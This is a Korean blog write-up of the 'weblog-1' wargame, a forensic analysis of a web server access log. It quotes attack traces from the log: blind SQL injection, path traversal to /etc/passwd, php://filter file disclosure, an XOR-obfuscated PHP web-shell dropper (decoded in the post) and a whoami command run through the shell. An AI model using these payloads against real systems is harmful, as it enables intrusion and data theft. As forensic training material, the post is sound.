Wargame - 웹

weblog-1

김가윤 2023. 5. 1. 17:14

 

풀이

 

admin 계정의 pw를 알아내야 한다.

 

주어진 access 파일에서

로그를 확인할 수 있다.

 

password를 검색해 보니

admin 계정의 pw를 알아내기 위해

sql 쿼리문을 통해 한 글자씩 비교한 흔적이 있다.

 

자세히 보니

1192라는 다른 응답 크기가 있다.

아마 참 일 때만 응답의 크기가 1192인 거 같다.

 

응답 크기가 1192인 요청 모두를 찾아

파이썬 코드를 통해 비밀번호 생성

pw = [97, 100, 109, 105, 110, 58, 84, 104, 49, 115, 95, 49, 115, 95, 65, 100, 109, 49, 110, 95, 80, 64, 83, 
      83, 44, 103, 117, 101, 115, 116, 58, 103, 117, 101, 115, 116]
result = ""

for _ in pw:
    result += chr(_)
    
print(result)

 

 

access 파일에서

config.php를 검색하니

상태 코드가 200인 부분이 하나 있었다.

172.17.0.1 - - [02/Jun/2020:09:54:18 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=../config.php HTTP/1.1" 200 986 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
php://filter/convert.base64-encode/resource=../config.php

 

 

access 파일에서

admin/?page=를 검색하니

17개의 로그가 있다.

172.17.0.1 - - [02/Jun/2020:09:53:05 +0000] "GET /admin/?page=users.php HTTP/1.1" 200 750 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:10 +0000] "GET /admin/?page=memo.php HTTP/1.1" 200 857 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:14 +0000] "GET /admin/?page=memo.php&memo=hi HTTP/1.1" 200 858 "http://127.0.0.1:8000/admin/?page=memo.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:18 +0000] "GET /admin/?page=memo.php HTTP/1.1" 200 858 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:22 +0000] "GET /admin/?page=users.php HTTP/1.1" 200 750 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:24 +0000] "GET /admin/?page=./users.php HTTP/1.1" 200 750 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:33 +0000] "GET /admin/?page=../../../../../etc/passwd HTTP/1.1" 200 1171 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:43 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 1554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:53:59 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=../index.php HTTP/1.1" 200 1384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:54:18 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=../config.php HTTP/1.1" 200 986 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:54:38 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=users.php HTTP/1.1" 200 1202 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:54:44 +0000] "GET /admin/?page=php://filter/convert.base64-encode/resource=memo.php HTTP/1.1" 200 1185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:55:06 +0000] "GET /admin/?page=memo.php HTTP/1.1" 200 858 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:55:08 +0000] "GET /admin/?page=users.php HTTP/1.1" 200 750 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:55:10 +0000] "GET /admin/?page=memo.php HTTP/1.1" 200 858 "http://127.0.0.1:8000/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:55:16 +0000] "GET /admin/?page=memo.php&memo=%3C?php%20function%20m($l,$T=0){$K=date(%27Y-m-d%27);$_=strlen($l);$__=strlen($K);for($i=0;$i%3C$_;$i%2b%2b){for($j=0;$j%3C$__;%20$j%2b%2b){if($T){$l[$i]=$K[$j]^$l[$i];}else{$l[$i]=$l[$i]^$K[$j];}}}return%20$l;}%20m(%27bmha[tqp[gkjpajpw%27)(m(%27%2brev%2bsss%2blpih%2bqthke`w%2bmiecaw*tlt%27),m(%278;tlt$lae`av,%26LPPT%2b5*5$040$Jkp$Bkqj`%26-?w}wpai,%20[CAP_%26g%26Y-?%27));%20?%3E HTTP/1.1" 200 1098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:55:39 +0000] "GET /admin/?page=/var/lib/php/sessions/sess_ag4l8a5tbv8bkgqe9b9ull5732 HTTP/1.1" 200 735 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

 

가장 의심스러운 로그는

맨 아래 2개이다.

 

memo 파라미터로 php 코드를 전달하는 로그를 살펴봤다.

172.17.0.1 - - [02/Jun/2020:09:55:16 +0000] "GET /admin/?page=memo.php&memo=%3C?php%20function%20m($l,$T=0){$K=date(%27Y-m-d%27);$_=strlen($l);$__=strlen($K);for($i=0;$i%3C$_;$i%2b%2b){for($j=0;$j%3C$__;%20$j%2b%2b){if($T){$l[$i]=$K[$j]^$l[$i];}else{$l[$i]=$l[$i]^$K[$j];}}}return%20$l;}%20m(%27bmha[tqp[gkjpajpw%27)(m(%27%2brev%2bsss%2blpih%2bqthke`w%2bmiecaw*tlt%27),m(%278;tlt$lae`av,%26LPPT%2b5*5$040$Jkp$Bkqj`%26-?w}wpai,%20[CAP_%26g%26Y-?%27));%20?%3E HTTP/1.1" 200 1098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

 

디코딩 후

코드 정리

<?php
    function m($l,$T=0){
        $K=date('Y-m-d');
        $_=strlen($l);
        $__=strlen($K);
        
        for($i=0;$i<$_;$i++){
            for($j=0;$j<$__; $j++){
                if($T){
                    $l[$i]=$K[$j]^$l[$i];
                }
                else{
                    $l[$i]=$l[$i]^$K[$j];
                }
            }
        }
        
        return $l;
    } 
    
    echo m('bmha[tqp[gkjpajpw')."\n";
    echo m('+rev+sss+lpih+qthke`w+miecaw*tlt')."\n";
    echo m('8;tlt$lae`av,&LPPT+5*5$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?');
?>

 

코드를 실행하니

이상한 값이 출력된다.

 

$K 변수를 보니

date 함수를 사용하는 것을 알 수 있는데

해당 페이로드를 이용한 시간으로 바꿔봤다.

2020-06-02

172.17.0.1 - - [02/Jun/2020:09:55:16 +0000] "GET /admin/?page=memo.php&memo=%3C?php%20function%20m($l,$T=0){$K=date(%27Y-m-d%27);$_=strlen($l);$__=strlen($K);for($i=0;$i%3C$_;$i%2b%2b){for($j=0;$j%3C$__;%20$j%2b%2b){if($T){$l[$i]=$K[$j]^$l[$i];}else{$l[$i]=$l[$i]^$K[$j];}}}return%20$l;}%20m(%27bmha[tqp[gkjpajpw%27)(m(%27%2brev%2bsss%2blpih%2bqthke`w%2bmiecaw*tlt%27),m(%278;tlt$lae`av,%26LPPT%2b5*5$040$Jkp$Bkqj`%26-?w}wpai,%20[CAP_%26g%26Y-?%27));%20?%3E HTTP/1.1" 200 1098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

172.17.0.1 - - [02/Jun/2020:09:55:16 +0000]
<?php
    function m($l,$T=0){
        $K="2020-06-02";
        $_=strlen($l);
        $__=strlen($K);
        
        for($i=0;$i<$_;$i++){
            for($j=0;$j<$__; $j++){
                if($T){
                    $l[$i]=$K[$j]^$l[$i];
                }
                else{
                    $l[$i]=$l[$i]^$K[$j];
                }
            }
        }
        
        return $l;
    } 
    
    echo m('bmha[tqp[gkjpajpw')."\n";
    echo m('+rev+sss+lpih+qthke`w+miecaw*tlt')."\n";
    echo m('8;tlt$lae`av,&LPPT+5*5$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?');
?>

 

/var/www/html/uploads/images.php를 제출했지만

정답은 아니었다.

 

맨 아래 페이로드가 정답이었다.

172.17.0.1 - - [02/Jun/2020:09:55:39 +0000] "GET /admin/?page=/var/lib/php/sessions/sess_ag4l8a5tbv8bkgqe9b9ull5732 HTTP/1.1" 200 735 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

/var/lib/php/sessions/sess_ag4l8a5tbv8bkgqe9b9ull5732

 

질문을 통해 위에서 분석한 PHP 코드를 통해 생성된 경로가

정답임을 알 수 있다.

/var/www/html/uploads/images.php

 

 

images.php 검색 후

맨 처음 나오는 요청에서 whoami 실행 확인

172.17.0.1 - - [02/Jun/2020:09:56:32 +0000] "GET /uploads/images.php?c=whoami HTTP/1.1" 404 490 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

 

저작자표시 (새창열림)

'Wargame - 웹' 카테고리의 다른 글

[wargame.kr] md5 password  (0) 2023.05.05
baby-sqlite  (0) 2023.05.03
mongoboard  (0) 2023.04.26
DOM XSS  (0) 2023.04.24
XS-Search  (0) 2023.04.21

'Wargame - 웹'의 다른글

  • 현재글weblog-1

관련글

티스토리툴바